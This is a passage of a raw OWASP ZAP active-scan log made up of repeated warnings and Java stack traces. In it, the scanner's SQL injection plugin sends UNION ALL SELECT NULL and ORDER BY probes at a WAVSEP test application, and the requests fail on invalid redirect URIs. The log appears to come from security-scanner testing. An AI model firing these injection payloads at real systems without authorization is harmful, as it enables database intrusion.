at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682360 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682361 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682361 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682362 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682362 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682363 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682364 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682365 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682365 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682366 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682366 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682367 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682368 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at 